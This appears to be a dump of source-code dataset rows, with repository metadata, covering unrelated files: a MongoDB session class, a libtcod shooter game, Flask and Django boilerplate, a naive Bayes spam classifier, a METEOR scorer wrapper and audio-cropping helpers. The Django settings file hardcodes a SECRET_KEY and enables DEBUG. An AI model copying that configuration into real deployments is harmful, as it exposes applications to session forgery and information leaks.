class MongoDBSession(outer.AbstractDBSession):
"""Реализация сессии с хранением в MongoDB.
При совпадении id и группы данные записываются в специальную коллекцию, в ином случае в коллекцию
группы таблицы.
"""
def __init__(self, db: motor_asyncio.AsyncIOMotorDatabase) -> None:
"""Получает ссылку на базу данных."""
self._logger = logger.AsyncLogger(self.__class__.__name__)
self._db = db
async def get(self, table_name: outer.TableName) -> Optional[outer.TableTuple]:
"""Извлекает документ из коллекции."""
collection, name = _collection_and_name(table_name)
doc = await self._db[collection].find_one({"_id": name})
if doc is None:
return None
df = pd.DataFrame(**doc["data"])
return outer.TableTuple(*table_name, df=df, timestamp=doc["timestamp"])
async def commit(self, tables_vars: Iterable[outer.TableTuple]) -> None:
"""Записывает данные в MongoDB."""
aws = []
for table in tables_vars:
collection, name = _collection_and_name(table)
self._logger.info(f"Сохранение {collection}.{name}")
aw_update = self._db[collection].replace_one(
filter={"_id": name},
replacement=dict(_id=name, data=table.df.to_dict("split"), timestamp=table.timestamp),
upsert=True,
)
aws.append(aw_update)
await asyncio.gather(*aws)
| [
"wlmike@gmail.com"
] | wlmike@gmail.com |
a5708d9753024ed899407f0318b9ef2849457e9e | b6c536f0bc006697edb70306f0bb16d8f0d96e72 | /test.py | 15f6650d857911025e124ef5f61ed41cf74cc671 | [] | no_license | StevenOrn/my_first_game | e03e879895ffa8a05402a8fbe8714df2e786f61f | 3ea85e0c656a543619fec0a3512df80275f0bdbb | refs/heads/master | 2020-03-21T08:26:36.852606 | 2018-07-02T23:21:35 | 2018-07-02T23:21:35 | 138,343,795 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,130 | py | import libtcodpy as libtcod
from random import randint
import math
#actual size of the window
SCREEN_WIDTH = 90
SCREEN_HEIGHT = 100
#size of the map
MAP_WIDTH = 90
MAP_HEIGHT = 90
LIMIT_FPS = 10 #Game speed
#intialize score
score = 0
color_dark_wall = libtcod.Color(0, 0, 100)
color_dark_ground = libtcod.Color(50, 50, 150)
class Tile:
#a tile of the map and its properties
def __init__(self, blocked, block_sight = None):
self.blocked = blocked
#by default, if a tile is blocked, it also blocks sight
if block_sight is None: block_sight = blocked
self.block_sight = block_sight
class Object:
#this is a generic object: the player, a monster, an item, the stairs...
#it's always represented by a character on screen.
def __init__(self, x, y, char ,direction =(0,0),hp=1,hostile=False):
self.x = x
self.y = y
self.char = char
self.direction = direction
self.hp = hp
self.points = hp
self.hostile = hostile
self.player = False
self.update_color()
def isplayer(self):
self.player = True
def update_color(self):
colors_dict = {3:libtcod.green,2:libtcod.yellow,1:libtcod.red}
self.color = colors_dict[self.hp]
def move(self, dx, dy):
#move by the given amount, if the destination is not blocked
if map[self.x + dx][self.y + dy].blocked:
return True
else:
self.x += dx
self.y += dy
return False
def objects_collide(self,other):
if (self.hostile and other.hostile):
return False
elif (self.x == other.x and self.y == other.y):
return True
else:
return False
def check_hp(self):
if (self.hp <= 0):
global score
#self.clear()
self.char = ' '
objects.remove(self)
if self.player:
gameover()
elif self.hostile:
score+= self.points
else:
self.update_color()
def draw(self):
#set the color and then draw the character that represents this object at its position
libtcod.console_set_default_foreground(con, self.color)
libtcod.console_put_char(con, int(self.x), int(self.y), self.char, libtcod.BKGND_NONE)
def clear(self):
#erase the character that represents this object
libtcod.console_put_char(con, int(self.x), int(self.y), ' ', libtcod.BKGND_NONE)
def make_map(endgame = False):
global map
#fill map with "unblocked" tiles
map = [[ Tile(endgame)
for y in range(MAP_HEIGHT) ]
for x in range(MAP_WIDTH) ]
#place two pillars to test the map
for y in range(MAP_HEIGHT):
map[MAP_WIDTH-1][y].blocked = True
# map[int(MAP_WIDTH/3)][y].blocked = True
# map[int(MAP_WIDTH*2/3)][y].blocked = True
map[0][y].blocked = True
for x in range(MAP_WIDTH):
map[x][MAP_HEIGHT-1].blocked = True
# map[x][int(MAP_HEIGHT/3)].blocked = True
# map[x][int(MAP_HEIGHT*2/3)].blocked = True
map[x][0].blocked = True
def render_all():
global color_light_wall
global color_light_ground
#go through all tiles, and set their background color
render_score()
for y in range(MAP_HEIGHT):
for x in range(MAP_WIDTH):
if map[x][y].blocked:
libtcod.console_set_char_background(con, x, y, color_dark_wall, libtcod.BKGND_SET )
else:
libtcod.console_set_char_background(con, x, y, color_dark_ground, libtcod.BKGND_SET )
#draw all objects in the list
for object in objects:
if(object.move(*object.direction)):
objects.remove(object)
else:
check_collide(object)
object.draw()
#blit the contents of "con" to the root console
libtcod.console_blit(con, 0, 0, SCREEN_WIDTH, SCREEN_HEIGHT, 0, 0, 0)
def handle_keys():
key = libtcod.console_check_for_keypress() #real-time
#key = libtcod.console_wait_for_keypress(True) #turn-based
if key.vk == libtcod.KEY_ENTER and key.lalt:
#Alt+Enter: toggle fullscreen
libtcod.console_set_fullscreen(not libtcod.console_is_fullscreen())
elif key.vk == libtcod.KEY_ESCAPE:
return True #exit game
if libtcod.console_is_key_pressed(libtcod.KEY_SPACE):
shoot()
#movement keys
if libtcod.console_is_key_pressed(libtcod.KEY_UP):
player.move(0, -1)
player.char = '^'
elif libtcod.console_is_key_pressed(libtcod.KEY_DOWN):
player.move(0, 1)
player.char = 'v'
elif libtcod.console_is_key_pressed(libtcod.KEY_LEFT):
player.move(-1, 0)
player.char = '<'
elif libtcod.console_is_key_pressed(libtcod.KEY_RIGHT):
player.move(1, 0)
player.char = '>'
def shoot():
if player.char == '^':
direction = (0,-1)
elif player.char == 'v':
direction = (0,1)
elif player.char == '<':
direction = (-1,0)
elif player.char == '>':
direction = (1,0)
bullet = Object(player.x,player.y,'*',direction)
bullet.move(*direction)
bullet.move(*direction)
objects.append(bullet)
def create_enemy():
direction = (randint(-1,1),randint(-1,1))
hp = randint(1,3)
enemy = Object(randint(10, MAP_WIDTH -10), randint(10, MAP_HEIGHT -10), '@', direction,hp,True)
objects.append(enemy)
def check_collide(object):
for other_object in objects:
if(object.objects_collide(other_object) and object!=other_object):
object.hp-=1
other_object.hp-=1
object.check_hp()
other_object.check_hp()
def gameover():
make_map(True)
def render_score():
global score
libtcod.console_print(con, int(MAP_WIDTH/2), int(SCREEN_HEIGHT-(SCREEN_HEIGHT - MAP_HEIGHT)/2), str(score))
#############################################
# Initialization & Main Loop
#############################################
libtcod.console_set_custom_font('arial10x10.png', libtcod.FONT_TYPE_GREYSCALE | libtcod.FONT_LAYOUT_TCOD)
libtcod.console_init_root(SCREEN_WIDTH, SCREEN_HEIGHT, 'test tutorial', False)
libtcod.sys_set_fps(LIMIT_FPS)
con = libtcod.console_new(SCREEN_WIDTH, SCREEN_HEIGHT)
#intialize score
# score = 1
#create object representing the player
player = Object(int(SCREEN_WIDTH/2), int(SCREEN_HEIGHT/2), '^')
player.isplayer()
#the list of objects with those two
objects = [player]
#generate map (at this point it's not drawn to the screen)
make_map()
while not libtcod.console_is_window_closed():
#spawn rate
if randint(1,100) <= 10:
create_enemy()
#render the screen
render_all()
libtcod.console_flush()
#erase all objects at their old locations, before they move
for object in objects:
object.clear()
#handle keys and exit game if needed
exit = handle_keys()
if exit:
break | [
"stevenorn@aol.com"
] | stevenorn@aol.com |
f9fbf68b0154bfbe4fd456acd69ec3818da9b88d | 87ed932190c4934cffb04ffb77963cb4d831ca3b | /app.py | 83f1758f5dbc480892ccf417a84b5b0749f36a15 | [] | no_license | zchase/deployPython | 2cab4068f5e5cc4c9fff16a74ea19e775f5461ce | cdef059d0328f2f02524e333c571d3317f974ba9 | refs/heads/master | 2021-01-10T00:57:39.443858 | 2015-12-30T21:24:43 | 2015-12-30T21:24:43 | 48,819,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 601 | py | #!/usr/bin/env python
from flask import Flask
import sys
import optparse
import time
app = Flask(__name__)
start = int(round(time.time()))
@app.route("/")
def hello_world():
return "Hello World!"
if __name__ == '__main__':
parser = optparse.OptionParser(usage="python simpleapp.py -p <port>")
parser.add_option('-p', '--port', action='store', dest='port', help='The port to listen on.')
(args, _) = parser.parse_args()
if args.port == None:
print "Missing required argument: -p/--port"
sys.exit(1)
app.run(host='0.0.0.0', port=int(args.port), debug=False) | [
"zack@distelli.com"
] | zack@distelli.com |
22cb1afffa9f329ebfcbe75c0c93d8c82eaccab7 | f13acd0d707ea9ab0d2f2f010717b35adcee142f | /ABC/abc251-abc300/abc291/a/main.py | 271121f05c994fc6965d9d50bef5b54640e06764 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | KATO-Hiro/AtCoder | 126b9fe89fa3a7cffcbd1c29d42394e7d02fa7c7 | bf43320bc1af606bfbd23c610b3432cddd1806b9 | refs/heads/master | 2023-08-18T20:06:42.876863 | 2023-08-17T23:45:21 | 2023-08-17T23:45:21 | 121,067,516 | 4 | 0 | CC0-1.0 | 2023-09-14T21:59:38 | 2018-02-11T00:32:45 | Python | UTF-8 | Python | false | false | 255 | py | # -*- coding: utf-8 -*-
def main():
import sys
input = sys.stdin.readline
s = input().rstrip()
for i, si in enumerate(s, 1):
if si.isupper():
print(i)
exit()
if __name__ == "__main__":
main()
| [
"k.hiro1818@gmail.com"
] | k.hiro1818@gmail.com |
f4889ab3192e5b2391525b80f2cd647d5ffb097f | 61ef327bd1d5ff6db7595221db6823c947dab42b | /FlatData/ScenarioCharacterAction.py | a9f4a598c4032f027b4141bed04cca067ccf7dac | [] | no_license | Aikenfell/Blue-Archive---Asset-Downloader | 88e419686a80b20b57a10a3033c23c80f86d6bf9 | 92f93ffbdb81a47cef58c61ec82092234eae8eec | refs/heads/main | 2023-09-06T03:56:50.998141 | 2021-11-19T12:41:58 | 2021-11-19T12:41:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 262 | py | # automatically generated by the FlatBuffers compiler, do not modify
# namespace: FlatData
class ScenarioCharacterAction(object):
Idle = 0
Shake = 1
Greeting = 2
FalldownLeft = 3
FalldownRight = 4
Stiff = 5
Hophop = 6
Jump = 7
| [
"rkolbe96@gmail.com"
] | rkolbe96@gmail.com |
3ca3cfe18c48de8901db82c058c6aa30b28b11fb | 62255db1163d1c097c87412f213555fe26c49262 | /pangram/pangram.py | 0680416ce10b4e2d1d96bde1ff514ad69d156309 | [] | no_license | lazhenko/my_projects | 6967ed8a2a1ec1b25c3049f5e9acc6b77c77ca91 | 421661c24bc50975ad5d324df9a3332ea843de95 | refs/heads/master | 2023-07-07T04:00:11.692611 | 2021-08-13T19:13:50 | 2021-08-13T19:13:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 142 | py | from string import ascii_lowercase
def is_pangram(string):
Alphabet = set(ascii_lowercase)
return Alphabet.issubset(string.lower())
| [
"mailkraivn@gmail.com"
] | mailkraivn@gmail.com |
e48fd8b191b8ec5f3399d0223533e0b66640bfc8 | e5bc4b33fffb6c9dfccc38ab2b5db4e6535a4b39 | /nbclassify_part2.py | 5eed626be061733bbfe05b5e895c3540511b36e2 | [] | no_license | ashwini1708/NLP-Project-Naive-Bayes-Classifier | ddf002c49e08a7592daec5afb4a08cb76720c876 | e8d4872b4a8ea5dc86309fa9464903f4e0780425 | refs/heads/master | 2021-01-18T03:53:46.342299 | 2017-03-22T03:22:06 | 2017-03-22T03:22:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,423 | py | import sys
import os
import json
import math
from math import log10
record=[]
def classify(src):
intermediate_output= open("nbmodel.txt", "r", encoding="latin1")
for line in intermediate_output:
record.append(json.loads(line))
probability=record[0]
words=record[1]
spam_dic=record[2]
ham_dic=record[3]
# FETCHING ACTUAL FILE COUNT
file_counter_ham=0
file_counter_spam=0
spam_counter=0
ham_counter=0
correct_spam=0
correct_ham=0
for root, dirs, files in os.walk(src):
for fname in files:
if "ham" in fname:
file_counter_ham=file_counter_ham +1
elif "spam" in fname:
file_counter_spam=file_counter_spam +1
try:
os.remove('nboutput.txt')
except OSError:
pass
f = open('nboutput.txt', 'w')
for root, dirs, files in os.walk(src):
for file in files:
if file.endswith(".txt"):
file_open=open(root + "/" + file, "r", encoding="latin1").read()
tokens=file_open.split()
prob_spam_words = 0.0
prob_ham_words = 0.0
for i in tokens:
if i in spam_dic:
prob_spam_words = (prob_spam_words) + spam_dic[i]
# else:
# prob_spam_words+=0.0
if i in ham_dic:
prob_ham_words = (prob_ham_words) + (ham_dic[i])
# else:
# prob_ham_words+=0.0
prob_spam_words=log10(probability[0]) + (prob_spam_words)
prob_ham_words = log10(probability[1]) +(prob_ham_words)
if(prob_spam_words > prob_ham_words):
f.write("spam" +" " + root + '/' + file + "\n")
spam_counter=spam_counter+1
elif(prob_spam_words < prob_ham_words):
f.write("ham" +" " + root + '/'+ file + "\n")
ham_counter=ham_counter+1
else:
f.write(root + file + "\n")
f.close()
output = open("nboutput.txt", "r", encoding="latin1").readlines()
for line in output:
line=line.split()
# print (line[0])
# print(line[1])
if line[0].lower() in line[1]:
if line[0].lower() == "spam":
correct_spam=correct_spam + 1
else:
correct_ham = correct_ham + 1
#calculating precision
#precision = (correctly classified as ck) / (classified as ck)
precision_spam=correct_spam / spam_counter
precision_ham = correct_ham / ham_counter
# REcall = (correctly classified as ck) / (belongs to ck)
recall_spam=correct_spam / file_counter_spam
recall_ham = correct_ham / file_counter_ham
# F-score calculation
f_score_spam =(2* precision_spam * recall_spam )/ (precision_spam + recall_spam)
f_score_ham = (2 * precision_ham * recall_ham) / (precision_ham + recall_ham)
print ("precison spam is " ,precision_spam )
print("precison ham is ", precision_ham)
print("recall spam is ", recall_spam)
print("recall ham is ", recall_ham)
print("F score spam is" ,f_score_spam )
print("F score ham is", f_score_ham)
avg_weight = ((f_score_ham + f_score_spam) / 2)
print("weighted Avg : ", avg_weight)
classify(sys.argv[1]) | [
"noreply@github.com"
] | ashwini1708.noreply@github.com |
cb0d0235383af6ed0f9cf485e18c73f882f87d6c | 56297e13de0b916468d9474b903961dc033617c1 | /Django/python_belt - Copy/python_belt/settings.py | 9f7a01b8b056498909a8075223894c0a3dd757de | [] | no_license | faizanrahman/Python-Stack | d36f841eea648df31bbbb4576d1a2aae1a3b0aa6 | ccdec31f4fac01da701f61437fdf3614badf8ce9 | refs/heads/master | 2022-11-08T08:25:54.525633 | 2019-01-03T03:05:45 | 2019-01-03T03:05:45 | 163,916,233 | 0 | 0 | null | 2022-11-01T13:29:45 | 2019-01-03T03:01:12 | Python | UTF-8 | Python | false | false | 3,130 | py | """
Django settings for python_belt project.
Generated by 'django-admin startproject' using Django 1.10.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.10/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '$imzq*k4xrl5$z0w3@6w0@55vok0pq2y_f^vqtwqv0jl6%*z32'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'apps.loginapp',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'python_belt.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'python_belt.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.10/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
| [
"faizanrahman89@gmail.com"
] | faizanrahman89@gmail.com |
a24cc4135e73aa701d1e7b6ffe6394d037b3b69b | 49f9f728a0f640a2972cb1c00105941536169b67 | /pic/wsgi.py | f416491e871f25797cf3fdf4ab8605952cc4355d | [] | no_license | Captainfeii/my-first-upload | 453c2fc56d4d13f5730aedeea4f0f5063f965e33 | 9e1d95c411375d972e2ea4c16adc3718892bf24f | refs/heads/master | 2020-03-23T10:16:11.049963 | 2018-07-18T12:44:47 | 2018-07-18T12:44:47 | 141,434,213 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | """
WSGI config for pic project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "pic.settings")
application = get_wsgi_application()
| [
"582752944@qq.com"
] | 582752944@qq.com |
4507b0a0250c6b95f949cf60bfc101f8efbe17ef | 17124c2268d7d7b0e9545a1ddaf293a49fafcf72 | /seq2seq/evaluation/meteor/meteor.py | 4a9c0696a513d24b74e15736ecb66a7501dbe317 | [] | no_license | haxzie-xx/code-to-comment | 56fadaf3b1be36daf2450159740cbd7d660fa438 | 5007d96c0e5ced57dcee7485a200a0e0a2c11e7d | refs/heads/master | 2020-04-28T15:22:14.721580 | 2019-03-13T08:35:06 | 2019-03-13T08:35:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,077 | py | #!/usr/bin/env python
# Python wrapper for METEOR implementation, by Xinlei Chen
# Acknowledge Michael Denkowski for the generous discussion and help
import os
import sys
import subprocess
import threading
# Assumes meteor-1.5.jar is in the same directory as meteor.py. Change as needed.
METEOR_JAR = 'meteor-1.5.jar'
# print METEOR_JAR
class Meteor:
def __init__(self):
self.meteor_cmd = ['java', '-jar', '-Xmx2G', METEOR_JAR, \
'-', '-', '-stdio', '-l', 'en', '-norm']
self.meteor_p = subprocess.Popen(self.meteor_cmd, \
cwd=os.path.dirname(os.path.abspath(__file__)), \
stdin=subprocess.PIPE, \
stdout=subprocess.PIPE, \
stderr=subprocess.PIPE)
# Used to guarantee thread safety
self.lock = threading.Lock()
# gts = reference list
# res = hypotheses
def compute_score(self, gts, res):
assert(gts.keys() == res.keys())
imgIds = gts.keys()
scores = []
eval_line = 'EVAL'
self.lock.acquire()
for i in imgIds:
assert(len(res[i]) == 1)
stat = self._stat(res[i][0], gts[i])
eval_line += ' ||| {}'.format(stat)
self.meteor_p.stdin.write('{}\n'.format(eval_line))
for i in range(0,len(imgIds)):
scores.append(float(self.meteor_p.stdout.readline().strip()))
score = float(self.meteor_p.stdout.readline().strip())
self.lock.release()
return score, scores
def method(self):
return "METEOR"
def _stat(self, hypothesis_str, reference_list):
# SCORE ||| reference 1 words ||| reference n words ||| hypothesis words
hypothesis_str = hypothesis_str.replace('|||','').replace(' ',' ')
score_line = ' ||| '.join(('SCORE', ' ||| '.join(reference_list), hypothesis_str))
self.meteor_p.stdin.write('{}\n'.format(score_line))
return self.meteor_p.stdout.readline().strip()
def _score(self, hypothesis_str, reference_list):
self.lock.acquire()
# SCORE ||| reference 1 words ||| reference n words ||| hypothesis words
hypothesis_str = hypothesis_str.replace('|||','').replace(' ',' ')
score_line = ' ||| '.join(('SCORE', ' ||| '.join(reference_list), hypothesis_str))
self.meteor_p.stdin.write('{}\n'.format(score_line))
stats = self.meteor_p.stdout.readline().strip()
eval_line = 'EVAL ||| {}'.format(stats)
# EVAL ||| stats
self.meteor_p.stdin.write('{}\n'.format(eval_line))
score = float(self.meteor_p.stdout.readline().strip())
# bug fix: there are two values returned by the jar file, one average, and one all, so do it twice
# thanks for Andrej for pointing this out
score = float(self.meteor_p.stdout.readline().strip())
self.lock.release()
return score
def __exit__(self):
self.lock.acquire()
self.meteor_p.stdin.close()
self.meteor_p.kill()
self.meteor_p.wait()
self.lock.release() | [
"tjalling_haije@outlook.com"
] | tjalling_haije@outlook.com |
3fb6596f25e82ad3306342bc206831a44c1a8f19 | 16f50a812eca90748e87bfe471e0c05f178337fd | /4to_Semestre/Metodos computacionales/Racket/Actividad 3.4 Final/Examples/example.py | 4fb7031bd1d767a5b0850a0aeefe25131ea51227 | [] | no_license | SeaWar741/ITC | 65f73365762366f56cfbd6d0bc788cd384672d12 | 5f75716be58ca6e00bcd8dae7546fd19fe37657f | refs/heads/master | 2023-02-05T23:25:13.972031 | 2022-09-29T10:38:32 | 2022-09-29T10:38:32 | 205,020,772 | 4 | 2 | null | 2023-01-19T15:28:45 | 2019-08-28T20:48:35 | Jupyter Notebook | UTF-8 | Python | false | false | 288 | py | # Python Program to find the factors of a number
# This function computes the factor of the argument passed
def print_factors(x ) :
print( " The factors of " , x , " are: " )
for i in range( 1 , x + 1 ) :
if x % i == 0:
print( i )
num = 320
print_factors( num ) | [
"juanca741@gmail.com"
] | juanca741@gmail.com |
6e643496ecb597de33e522329bf295891b5a62e1 | 108f12e6a8acd23e89ba5d6972d46647c71a62d2 | /ImPloc-revision/model/result.py | 4c6bef4331b397389c819604668e999779122cca | [] | no_license | YutLan/CS385Project-1 | 62e30083c520be5dda758d64dc975f1cad8ed9d5 | 5e6c7a3b963a398ee2c8e80aa1ef91cea7370f11 | refs/heads/master | 2022-11-12T03:08:09.324853 | 2020-06-28T11:00:25 | 2020-06-28T11:00:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,123 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# merge kfold result
import os
import pandas as pd
def merge_agg(fv="slf"):
if fv == 'slf':
srcdir = os.path.join("result-paper/agg_slf")
elif fv == "cnnfeat":
srcdir = os.path.join("result-paper/cnnfeat")
else:
srcdir = os.path.join("result-paper/agg_resnet")
methods = os.listdir(srcdir)
folds = list(range(1, 11))
perf = {}
for m in methods:
for fold in folds:
sid = m + "_" + fv + "_fold" + str(fold)
perf[sid] = {}
path = os.path.join(srcdir, m, "fold%d.txt" % fold)
perf[sid]['model'] = m
perf[sid]["fold"] = fold
with open(path, 'r') as f:
for line in f.readlines():
key, value = [
x.strip() for x in line.strip("\n").split(":")]
perf[sid][key] = value
df = pd.DataFrame(perf).T
outf = os.path.join(srcdir, "result.csv")
df.to_csv(outf)
if __name__ == "__main__":
# merge_agg("slf")
# merge_agg("resnet")
merge_agg("cnnfeat")
| [
"curryjam_cg@sjtu.edu.cn"
] | curryjam_cg@sjtu.edu.cn |
e7a39938e98fc492d197143c76952b59f8476916 | ac1f67d2757c9c75a7d3e2491afde3e17acbc2b6 | /crocomire.wsgi | e69a10e933b6c2d964447fe7e5a9a377cde51eab | [] | no_license | tewtal/crocomire | 049164c479155e4dd5129e6ac90dde0c66dfce05 | db6d26f4c1c3db5cbf82d467662286d43f60dc36 | refs/heads/master | 2021-01-20T00:58:41.020391 | 2015-10-21T20:51:28 | 2015-10-21T20:51:28 | 44,681,456 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 313 | wsgi | import sys
import os
from werkzeug.debug import DebuggedApplication
sys.path.insert(0, '/var/www/crocomi.re/')
import monitor
monitor.start(interval=1.0)
monitor.track(os.path.join(os.path.dirname(__file__), 'site.cf'))
from crocomire import app
#application = DebuggedApplication(app, True)
application = app
| [
"total@ceres.viskos.org"
] | total@ceres.viskos.org |
b559b0f74e82358f594c0ca321b4f0416d12288a | 09d6e0e85f57a8fe64b3920263a73c7433568260 | /src/controller.py | 91cf5c2cef6063eb9d557079c9a18e152f83cb87 | [
"MIT"
] | permissive | CHern0g0r/JB2020AudioAnomaiy | 0b6240193a9dc2168470858ba9de7762c1aaa032 | 6467c18e6c6f6768f8d7dc83fd93e8e42bc13368 | refs/heads/master | 2022-12-12T05:05:45.500479 | 2020-09-15T23:01:23 | 2020-09-15T23:01:23 | 295,376,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 899 | py | from pydub import AudioSegment
folder = 'samples/'
def crop(audio_file, intervals):
song = AudioSegment.from_mp3(folder + audio_file)
new_inters = [0] + list(map(lambda x: x * 1000, intervals)) + [-1]
segments = [song[new_inters[i]: new_inters[i+1]]
for i in range(len(new_inters) - 1)]
for i, segment in enumerate(segments):
segment.export('{}{}_segment{}.mp3'.format(folder, audio_file[:-4], i),
format='mp3')
def concatenate(audio_files, filename):
segments = [AudioSegment.from_mp3(folder + f) for f in audio_files]
res = AudioSegment.empty()
for segment in segments:
res += segment
res.export(folder + filename, format='mp3')
def reverse(audio_file, filename):
song = AudioSegment.from_mp3(folder + audio_file)
backwards = song.reverse()
backwards.export(folder + filename, format='mp3')
| [
"fyodorchernogor@gmail.com"
] | fyodorchernogor@gmail.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.